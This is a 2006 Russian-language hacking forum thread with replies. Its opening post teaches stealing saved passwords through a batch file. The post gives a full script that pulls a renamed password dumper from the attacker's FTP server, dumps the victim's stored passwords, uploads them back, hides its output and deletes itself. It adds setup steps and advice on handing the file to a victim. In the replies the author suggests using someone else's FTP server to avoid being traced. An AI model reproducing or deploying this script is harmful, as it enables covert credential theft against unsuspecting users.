Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Воровство паролей через bat файл. |
12.10.2006, 13:28
|
|
Новичок
Регистрация: 12.10.2006
Сообщений: 7
Провел на форуме:
26708
Репутация:
36
|
|
Воровство паролей через bat файл.
Всем привет!
В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.
Начнем! 
Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь. Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.exe” ( PassView Pro).
Дальше нам надо скачать ftp сервер, я возьму “ Pablo’s ftp server”, на мой взгляд он простенький, и полностью подходит для этого дела. Качаем его отсюда, у меня он будет находится в “c:\ftp”. Теперь надо настроить его. Запускаем ftpserver.exe, жмем вкладку “server”, выбираем там “User Account Wizard”. В поле “account name” пишем “ftpuser”, жмем “далее”. В поле “password” напишем “12345” и повторим это в поле “confirm password”, теперь жмем “далее”. Теперь нам надо указать папку, которая будет открыта этому пользователю, я создавал в диске c:\, указываю “c:\temp”, жмём “далее”. Отмечаем галочки “Allow Download”, “Allow Upload”, жмем далее и готово! Все, настройка фтп сервера закончена! Теперь нам понадобится текстовый редактор, он у нас уже открыт. Пишем в него:
Код:
@echo off
Echo open xxx.xxx.xxx.xxx>go.txt&&echo ftpuser>>go.txt&&echo 12345>>go.txt&&echo get passexport.exe>>go.txt&&echo bye>>go.txt
Echo open xxx.xxx.xxx.xxx>send.txt&&echo ftpuser>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat
Теперь я объясню каждую делать этого кода.
xxx.xxx.xxx.xxx - IP фтп сервера
Echo – записывает текст
> - указывает какой файл создать
>> - в какой дописать
&& - тоже самое, что запитая в русском языке =)
ftp – фтп клиент встроенный в windows
-s: - открывает сценарий
del go.txt send.txt passexport.txt pass.txt name.bat - это строчка указывает, какие файлы удалить после запуска файла, она удалит все за собой, в том числе и себя. (измените name.bat на свое название, когда вы сохраните в .bat файл)
> nul – скрывает записи от пользовательских глаз
Сохраняем в name.bat и даем жертве! после того как жертва запустит этот файл, к вам в папку, которую вы указали для пользователя, в настройках фтп, прейдет текстовый файл с паролями(в статье я указывал c:\temp).
Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
Статья предназначена для ознакомительных целей, за последствия не отвечаю!
Авторские права принадлежат modest, 12.10.06. (modest@xaker.ru)
|
|
|
12.10.2006, 13:55
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
Сообщение от modest
Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip  ..
это прокатит только с лохами про файрволл ниче не слыхавшими..
|
|
|
|
12.10.2006, 13:56
|
|
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265
Репутация:
843
|
|
Хм.....не проверял ,но молодец ! |
|
|
|
12.10.2006, 14:10
|
|
Новичок
Регистрация: 12.10.2006
Сообщений: 7
Провел на форуме:
26708
Репутация:
36
|
|
Сообщение от Digimortal
отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip ..
это прокатит только с лохами про файрволл ниче не слыхавшими.. А ты укажи не свой ип=) чужой фтп сервер.
Я проверял с включенным firewall, ниче не "вякал".
|
|
|
|
12.10.2006, 14:21
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Это вигня полная на самом деле.Тока полные ламеры могут сохранять свои пароли.
|
|
|
|
12.10.2006, 14:42
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
К примеру файрволл OUTPOST попалит и выдаст окно для того что спросить разрешиние на конект с xxxx.ru! Попройбу у себе на компе! Если у тебя OUTPOST
|
|
|
|
12.10.2006, 14:44
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
Сообщение от modest
А ты укажи не свой ип=) чужой фтп сервер.
так уже лучше =), надо было про это написать в статье, представь, сколько начинающих может спалиться, последуй они описанным в твоей статье действиям =)..
Сообщение от modest
Я проверял с включенным firewall, ниче не "вякал".
ну это у тебя так настроено, по хорошему, не стоит разрешать встроенному виндовому фтп-клиенту свободно выходить в сеть, если это действительно не необходимо (а кому это необходимо, а?)..
|
|
|
|
12.10.2006, 15:05
|
|
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212
Репутация:
111
|
|
Я наверно тупой
А какие пароли он тырит ? От чего ? |
|
|
|
12.10.2006, 15:06
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Стучал недавно один мyдак с такой фигней... зашел на фтп там сайт какой то "hack team" был...
|
|
|
|
12.10.2006, 16:09
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Сообщение от Diablo
Я наверно тупой
А какие пароли он тырит ? От чего ? От инета
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
